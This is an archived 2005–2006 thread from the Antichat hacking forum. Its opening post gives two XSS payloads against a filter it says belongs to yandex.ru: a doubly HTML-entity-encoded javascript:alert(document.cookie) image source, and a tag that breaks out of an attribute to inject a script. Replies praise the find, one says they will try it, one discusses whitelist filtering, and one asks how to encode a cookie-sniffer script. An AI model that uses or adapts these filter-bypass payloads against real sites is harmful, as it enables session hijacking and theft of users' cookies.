Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.05.2005, 01:40
|
|
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909
Репутация:
62
|
|
XSS в yandex.ru
Вот на yandex нашёл 2 xss.
1.
Код:
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41">
суть в том, что javascript :alert(document.cookie) кодируется к виду &#..., а потом получившаяся строчка ещё раз кодируется по такому же принципу. Фильтр один раз декодирует src и получится такое:
Код:
<img src="javascript:alert(document.cookie)">
это "javascript..." закодированое 1 раз
а это браузер прекрасно поймёт 
2.
Код:
<img src=a"><a id=xxx></a><script>alert(document.cookie);</script><a src=">
синим цветом - alert(document.cookie);
Ошибка фильтра опять в том, что неправильно понимает содержимое src и ещё хуже декодирует строки типа &#... |
|
|
13.05.2005, 11:18
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418
Репутация:
300
|
|
круто!
маладца!
|
|
|
|
13.05.2005, 13:01
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Да... я всегда говорил, что тупые методы защиты от Xss бесполезны....)))
|
|
|
|
13.05.2005, 13:22
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
LittleLamer что то ник не соответствует действительности! Респект за идею,будем пробовать!
|
|
|
|
06.01.2006, 17:49
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
Я не понимаю разве трудно профильтровать все с htmlspecilachars? ЗАЧЕМ КАКИЕ-ТО ФИЛЬТРЫ? Или я ошибаюсь?
|
|
|
|
06.01.2006, 19:02
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
ты ошибаешься - фича многих почтовых сервантов с веб интерфейсом в том что они позволяют юзать "приемлимые" теги типа <a>,<img> и тд Поэтому основная задача фильтра допустить использование только тегов из списка причем ключевые слова типа javascript,background и тд должны вырезаться или заменяться как в хакере на ЯваСкрИптъ (или что-то типа того) но бага все равно есть=)) Имхо для обеспечения полной безопасности достаточно дать пользователям использовать все теги только по определённому шаблону... например <aПРОБЕЛhref=УРЛ>ТЕКСТ</a> причем УРЛ и ТЕКСТ не должны содержать опасных символов типа ",<,>,'.
|
|
|
|
18.01.2006, 13:13
|
|
Новичок
Регистрация: 18.10.2005
Сообщений: 11
Провел на форуме:
127217
Репутация:
13
|
|
Мне срочно нужно узнать как закодировать скрипт сниффера!!!
|
|
|
|
18.01.2006, 13:38
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Берёшь да кодируешь много программ есть для этого!
|
|
|
|
18.01.2006, 16:15
|
|
Новичок
Регистрация: 18.10.2005
Сообщений: 11
Провел на форуме:
127217
Репутация:
13
|
|
А например?
|
|
|
|
18.01.2006, 23:44
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355
Репутация:
241
|
|
Вот скажите мне, накой поднимать старую тему чтоб тока сморознуть какую-то фигню?
Одно дело бы по сабжу хотяб, а то......Неужели "Болталка" для ОФФТОПА уже не годится???????????????????????
ЗАКРЫТО!
/ме злой
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
